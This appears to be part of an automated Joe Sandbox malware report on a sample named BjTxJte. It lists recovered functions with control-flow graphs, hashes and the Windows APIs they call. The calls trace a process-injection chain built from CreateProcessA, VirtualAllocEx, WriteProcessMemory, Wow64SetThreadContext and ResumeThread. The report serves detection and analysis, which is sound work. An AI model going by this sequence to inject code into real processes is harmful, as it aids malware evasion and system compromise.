                                  control_flow_graph 607 99cd2b0-99cd345 609 99cd37e-99cd39e 607->609 610 99cd347-99cd351 607->610 617 99cd3d7-99cd406 609->617 618 99cd3a0-99cd3aa 609->618 610->609 611 99cd353-99cd355 610->611 612 99cd378-99cd37b 611->612 613 99cd357-99cd361 611->613 612->609 615 99cd365-99cd374 613->615 616 99cd363 613->616 615->615 619 99cd376 615->619 616->615 624 99cd43f-99cd4f9 CreateProcessA 617->624 625 99cd408-99cd412 617->625 618->617 620 99cd3ac-99cd3ae 618->620 619->612 622 99cd3b0-99cd3ba 620->622 623 99cd3d1-99cd3d4 620->623 626 99cd3bc 622->626 627 99cd3be-99cd3cd 622->627 623->617 638 99cd4fb-99cd501 624->638 639 99cd502-99cd588 624->639 625->624 628 99cd414-99cd416 625->628 626->627 627->627 629 99cd3cf 627->629 630 99cd418-99cd422 628->630 631 99cd439-99cd43c 628->631 629->623 633 99cd424 630->633 634 99cd426-99cd435 630->634 631->624 633->634 634->634 635 99cd437 634->635 635->631 638->639 649 99cd598-99cd59c 639->649 650 99cd58a-99cd58e 639->650 652 99cd5ac-99cd5b0 649->652 653 99cd59e-99cd5a2 649->653 650->649 651 99cd590 650->651 651->649 655 99cd5c0-99cd5c4 652->655 656 99cd5b2-99cd5b6 652->656 653->652 654 99cd5a4 653->654 654->652 657 99cd5d6-99cd5dd 655->657 658 99cd5c6-99cd5cc 655->658 656->655 659 99cd5b8 656->659 660 99cd5df-99cd5ee 657->660 661 99cd5f4 657->661 658->657 659->655 660->661 663 99cd5f5 661->663 663->663
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 099CD4E6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: c50ca9ddb20e1a05840bcc528490be48e3208b050a378eea7e401010eeb666da
                                  • Instruction ID: d1668fee3228d203c5e64e66e4a637484d91f5cd4858598789a3bed67d86b294
                                  • Opcode Fuzzy Hash: c50ca9ddb20e1a05840bcc528490be48e3208b050a378eea7e401010eeb666da
                                  • Instruction Fuzzy Hash: EC915AB1D00219DFEF20DF69CC41BADBBB6BF48314F048169E848A7294DB749985CF92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0149B55F Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 664 149b55f-149b57f 665 149b5ab-149b5af 664->665 666 149b581-149b58e call 1498ac0 664->666 667 149b5b1-149b5bb 665->667 668 149b5c3-149b604 665->668 671 149b590 666->671 672 149b5a4 666->672 667->668 675 149b611-149b61f 668->675 676 149b606-149b60e 668->676 719 149b596 call 149b7f8 671->719 720 149b596 call 149b808 671->720 672->665 678 149b621-149b626 675->678 679 149b643-149b645 675->679 676->675 677 149b59c-149b59e 677->672 680 149b6e0-149b7a0 677->680 682 149b628-149b62f call 149af54 678->682 683 149b631 678->683 681 149b648-149b64f 679->681 714 149b7a8-149b7d3 GetModuleHandleW 680->714 715 149b7a2-149b7a5 680->715 686 149b65c-149b663 681->686 687 149b651-149b659 681->687 685 149b633-149b641 682->685 683->685 685->681 689 149b670-149b679 call 149af64 686->689 690 149b665-149b66d 686->690 687->686 695 149b67b-149b683 689->695 696 149b686-149b68b 689->696 690->689 695->696 697 149b6a9-149b6b6 696->697 698 149b68d-149b694 696->698 705 149b6d9-149b6df 697->705 706 149b6b8-149b6d6 697->706 698->697 700 149b696-149b6a6 call 149af74 call 149af84 698->700 700->697 706->705 716 149b7dc-149b7f0 714->716 717 149b7d5-149b7db 714->717 715->714 717->716 719->677 720->677
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0149B7C6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 4cd9d9a428fdfe06db7dc3131000a48721c37157581859f93c7a980f4bfda3d1
                                  • Instruction ID: a17470273a6b2d0a54191017415a9362aea9f1ff779c749e8c7c314099f64412
                                  • Opcode Fuzzy Hash: 4cd9d9a428fdfe06db7dc3131000a48721c37157581859f93c7a980f4bfda3d1
                                  • Instruction Fuzzy Hash: 5E813570A00B058FDB25DF2AE144B5ABBF5FF88200F148A2ED58AD7B60D774E845CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0149590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 721 149590c-14959d9 CreateActCtxA 723 14959db-14959e1 721->723 724 14959e2-1495a3c 721->724 723->724 731 1495a4b-1495a4f 724->731 732 1495a3e-1495a41 724->732 733 1495a51-1495a5d 731->733 734 1495a60 731->734 732->731 733->734 736 1495a61 734->736 736->736
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: ad084fa43c13759b2762cd15002d7b22158744d9c0570535375465b2771a5792
                                  • Instruction ID: 1664869296ba7443fb3a6ad3bea12231223a0106e64934387b713a53d656e900
                                  • Opcode Fuzzy Hash: ad084fa43c13759b2762cd15002d7b22158744d9c0570535375465b2771a5792
                                  • Instruction Fuzzy Hash: 3B41F2B1D00719CFDB25CFA9C884BDEBBB1BF49304F20806AD408AB265DB756946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 014944E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 737 14944e4-14959d9 CreateActCtxA 740 14959db-14959e1 737->740 741 14959e2-1495a3c 737->741 740->741 748 1495a4b-1495a4f 741->748 749 1495a3e-1495a41 741->749 750 1495a51-1495a5d 748->750 751 1495a60 748->751 749->748 750->751 753 1495a61 751->753 753->753
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 014959C9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 0b56a665e5e1f5fff0baca7f5c3b1a6d14d0f6e9ea8d885f57e59873e25fea45
                                  • Instruction ID: c8d3c242fa2fdd446ea6158f04c9457d964e632bd1734c734ea64d79942927e4
                                  • Opcode Fuzzy Hash: 0b56a665e5e1f5fff0baca7f5c3b1a6d14d0f6e9ea8d885f57e59873e25fea45
                                  • Instruction Fuzzy Hash: F141F0B1C0071DCBDB25DFA9C884BCEBBB5BF49304F60806AD408AB265DB756946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CD020 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 754 99cd020-99cd076 756 99cd078-99cd084 754->756 757 99cd086-99cd0c5 WriteProcessMemory 754->757 756->757 759 99cd0ce-99cd0fe 757->759 760 99cd0c7-99cd0cd 757->760 760->759
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 099CD0B8
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 36670ebfe4ac21b262dbee7b4ae6973aac703bfc1aecf1b353776f7b242ca28b
                                  • Instruction ID: 7d30afbb0d9e9a6cffd544c9153c7007094c1dd5ec14e9d9cd13384ecd3fec4d
                                  • Opcode Fuzzy Hash: 36670ebfe4ac21b262dbee7b4ae6973aac703bfc1aecf1b353776f7b242ca28b
                                  • Instruction Fuzzy Hash: 772113B19003099FDB10DFA9C985BEEBBF5FF88310F10842AE959A7250D7789945CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CD028 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 99cd028-99cd076 766 99cd078-99cd084 764->766 767 99cd086-99cd0c5 WriteProcessMemory 764->767 766->767 769 99cd0ce-99cd0fe 767->769 770 99cd0c7-99cd0cd 767->770 770->769
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 099CD0B8
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 50e8a6d26580a963149268fe3ae0118475e0b3e7cfca83e82e6d0712e3a4c520
                                  • Instruction ID: b23992b704fb178c75960f4c02ad71e93afce423e358fb4302ce474b35393233
                                  • Opcode Fuzzy Hash: 50e8a6d26580a963149268fe3ae0118475e0b3e7cfca83e82e6d0712e3a4c520
                                  • Instruction Fuzzy Hash: 6C2136B19003099FCB10DFAEC985BEEBBF5FF48310F10842AE959A7240C7789945CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CCE88 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 099CCF0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ffac341f9b84e09b6e404f88738a5e85786dfacb46c713c14f41f69145af95ce
                                  • Instruction ID: 84772c9c2dd9f0a159411991862dff89d1b2c2548b1d782350b04c6f34f7724a
                                  • Opcode Fuzzy Hash: ffac341f9b84e09b6e404f88738a5e85786dfacb46c713c14f41f69145af95ce
                                  • Instruction Fuzzy Hash: C32125B1D002098FDB10DFAAC8857EEBBF4EF88314F10882ED459A7240D7789945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CD112 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 099CD198
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 0769f952ffd5dd22a627feed75324e2c366067acad3311a417d7ecf42467cfbd
                                  • Instruction ID: 302a7c7462a87285a12cd91bf67dc75506a0b0a97977ad2c7765a78c59a582a5
                                  • Opcode Fuzzy Hash: 0769f952ffd5dd22a627feed75324e2c366067acad3311a417d7ecf42467cfbd
                                  • Instruction Fuzzy Hash: F52116B1D002499FDB14DFAAC981AEEBBF5FF48310F50842AE959A7250C7389945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CCE90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 099CCF0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 405b3f328a7df480e6685eb2527b9404695afc6459766819b803079f9f762fed
                                  • Instruction ID: 01388f66223fc749eb25c3749cdaac38aac035c7a2de4b42d6a7074cd91b22af
                                  • Opcode Fuzzy Hash: 405b3f328a7df480e6685eb2527b9404695afc6459766819b803079f9f762fed
                                  • Instruction Fuzzy Hash: 962135B19003098FDB10DFAAC8857AEBFF4EF48324F50842ED559A7240DB78A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CD118 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 099CD198
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: f2b0a26329f333d1883851465383914a97dcf33a8589192dbeaf35b6e8a40de1
                                  • Instruction ID: 93aa7e9cc530c058456a1fa0b6253180da54a608f37cfeda8071de3025b9ccdc
                                  • Opcode Fuzzy Hash: f2b0a26329f333d1883851465383914a97dcf33a8589192dbeaf35b6e8a40de1
                                  • Instruction Fuzzy Hash: 142137B1C003499FDB10DFAAC980AEEFBF5FF48310F50842AE919A7250C7389944CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0149DA40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149DAC7
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 51a7f79e5e7c7359e38e9db57216edb41aac828d6b81092cf20e787c2cc47238
                                  • Instruction ID: 85f43343388abe618b51e83c7b5463ecdd223d7557b93f2aa3214d82f973db81
                                  • Opcode Fuzzy Hash: 51a7f79e5e7c7359e38e9db57216edb41aac828d6b81092cf20e787c2cc47238
                                  • Instruction Fuzzy Hash: 3321C4B5D002489FDB10CFAAD584ADEBFF9FB48310F14841AE918A3350D378A954CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0149AFB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149B841,00000800,00000000,00000000), ref: 0149BA52
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 75b26108a5b76efbb822f7fb6f99fd4292579eecf2b5f656c570991ce3058c97
                                  • Instruction ID: 17b82b66cbe2dbb2fcb4df2298f53d13c9f4a6921a2162aac52df547f06d0cc4
                                  • Opcode Fuzzy Hash: 75b26108a5b76efbb822f7fb6f99fd4292579eecf2b5f656c570991ce3058c97
                                  • Instruction Fuzzy Hash: D611E4B69003499FDB10DF9AD444ADEFFF5EB48310F10842AE919A7210C379A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CCF60 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099CCFD6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f691cc9ed9303238e5eb93580fc370bf8803eb0794c237c839e4d4959e9a6bb6
                                  • Instruction ID: e527bd59a58d714e4416eb6d18595cf2a1a4aea25a618a5841d73d71dc26b095
                                  • Opcode Fuzzy Hash: f691cc9ed9303238e5eb93580fc370bf8803eb0794c237c839e4d4959e9a6bb6
                                  • Instruction Fuzzy Hash: 5E112971D002499FDB10DFA9C845AEEBFF5FF88310F10881AE559A7250C7799541CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CCF68 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099CCFD6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: b8755de52710dd7b39606e3451d146d9b47a4a1913df7350a2278eb3e5bc09ab
                                  • Instruction ID: db4b24745fef6177c6499041d5b91f1906a75f8e23925b6a947ff67e2ea87b85
                                  • Opcode Fuzzy Hash: b8755de52710dd7b39606e3451d146d9b47a4a1913df7350a2278eb3e5bc09ab
                                  • Instruction Fuzzy Hash: F41149B18002499FDB10DFAAC844AEFBFF5FF48320F108819E559A7250C779A540CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0149B9E1 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0149B841,00000800,00000000,00000000), ref: 0149BA52
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 69da1d93cedfbf1acc1e911584ee3c9116d228e472fbab5493476e5598eb0ccf
                                  • Instruction ID: dfec2e1bce0a76acd1a924951eaf370b007c41cef92d1caa623bab81f316759e
                                  • Opcode Fuzzy Hash: 69da1d93cedfbf1acc1e911584ee3c9116d228e472fbab5493476e5598eb0ccf
                                  • Instruction Fuzzy Hash: F111EFB6D002098FDB10CF9AD544ADEFBF5EF48321F14842AD919B7610C379A545CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CCDD8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 79fc51754fdfec3575f96e17034e3d90dfc649eb1e75dc3b60a71f3dd292eb9d
                                  • Instruction ID: d6eea4967987fa5b2f72fdf23457ac278c3da61f2a9576586eb4ed9f2d0a2b3e
                                  • Opcode Fuzzy Hash: 79fc51754fdfec3575f96e17034e3d90dfc649eb1e75dc3b60a71f3dd292eb9d
                                  • Instruction Fuzzy Hash: BE1146B1D002488FDB20DFAAC8457EEBBF5EF98310F20881AD559A7250C778A944CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 099CCDE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2234460137.00000000099C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_99c0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 289c626abf7dd1e497c5a721f72ff25d6254c0042fdcab26bb760e519dedff23
                                  • Instruction ID: bcb60a288b28079ddf46e62d7e22fef13c0753eb456aa449297cb6eb7009f525
                                  • Opcode Fuzzy Hash: 289c626abf7dd1e497c5a721f72ff25d6254c0042fdcab26bb760e519dedff23
                                  • Instruction Fuzzy Hash: A41128B19003488FDB20DFAAC8457AEFBF5EF99320F108819D559A7240CB79A944CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0149B760 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0149B7C6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2226042459.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_1490000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: ecff3f8a2489468614aea86e7acee5f8822ceefd0bab2166315a0ab99784cf80
                                  • Instruction ID: a61adb294ab2fbca8a760a3bd6f50a39527372d8e1b475c1956c0bb9d7634e57
                                  • Opcode Fuzzy Hash: ecff3f8a2489468614aea86e7acee5f8822ceefd0bab2166315a0ab99784cf80
                                  • Instruction Fuzzy Hash: C5110CB6C002498FDB10DF9AD444A9EFBF8EF89220F14856AD928B7610C379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0D8B12B8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D8B131D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2236691515.000000000D8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_d8b0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ca7547448586fea0f20f5125fbcea3b15020695127110c6b5dab87ed96e4df49
                                  • Instruction ID: b8feac5e2b289e62f8515091d61f46f14b66a244a3df7d39aafd769b89b1799e
                                  • Opcode Fuzzy Hash: ca7547448586fea0f20f5125fbcea3b15020695127110c6b5dab87ed96e4df49
                                  • Instruction Fuzzy Hash: 1511E3B58003489FDB10DF99D485BEEBBF8FB58320F20841AE559A7610D379A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0D8B12C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D8B131D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2236691515.000000000D8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_d8b0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: fa28e89bb777c94a319c27272861100df34a355867a347880be0b22d9bef05cc
                                  • Instruction ID: 14ecc1a82287ad8293ff890485baa8d9f4e865922c469f16f1d3b3bfd6b09cd0
                                  • Opcode Fuzzy Hash: fa28e89bb777c94a319c27272861100df34a355867a347880be0b22d9bef05cc
                                  • Instruction Fuzzy Hash: EC1103B58003489FDB10DF9AD448BDEFBF8FB48320F108419E558A7600C379A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 013FD3D8 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c56f4e484975b8a962840e2ba08a0fbe65e14f5e1c99078ebba9fd646fc4c29
                                  • Instruction ID: 3a7fc920320d76bc78d4a7af87a54371cca9f7cf7fcf11576796da5c4a997276
                                  • Opcode Fuzzy Hash: 0c56f4e484975b8a962840e2ba08a0fbe65e14f5e1c99078ebba9fd646fc4c29
                                  • Instruction Fuzzy Hash: 4F214871100204DFDB05DF58D9C8F56BF69FB88318F20C16DDA091B256C73AE406C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 013FD4C4 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9eab67417d4767dc34d26c45f9cdfaaa7f4f4dbf755e5ce5744a8ddc2b11ebed
                                  • Instruction ID: 6270645355bb121046141aad4f3554589ba935fbe757ba5ea8e256c12cc070eb
                                  • Opcode Fuzzy Hash: 9eab67417d4767dc34d26c45f9cdfaaa7f4f4dbf755e5ce5744a8ddc2b11ebed
                                  • Instruction Fuzzy Hash: 3B210371500244DFDB05DF98D9C8F26BF69FB8831CF20C56DEA090B256C33AD416CAA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0140D1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 706a051b5dc0dba4da9c5cfc93b425a125c30a40085d8bda43320567ff08a2c6
                                  • Instruction ID: 6e955a4f88176b5e1ea488323754f545a445d23ff48ad7956443dbf25d8d892f
                                  • Opcode Fuzzy Hash: 706a051b5dc0dba4da9c5cfc93b425a125c30a40085d8bda43320567ff08a2c6
                                  • Instruction Fuzzy Hash: FB21D671904204DFDB06DF99D580B26BB65FB84324F20C57ED9094B3A6C33AD40ACA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0140D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38baafe0930b62e925664c72d48c2c3981ce564c87f0e585977b2e44f77bb56b
                                  • Instruction ID: b568877dbd677e003fc180ebe9cb0770ebd2ecaa3315fcb21183cfb0d6a8a5a8
                                  • Opcode Fuzzy Hash: 38baafe0930b62e925664c72d48c2c3981ce564c87f0e585977b2e44f77bb56b
                                  • Instruction Fuzzy Hash: EE2106B1904200DFDB16DFA8D980B16BF65EB84318F20C57AD90D4B3A6C33AD40BCA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

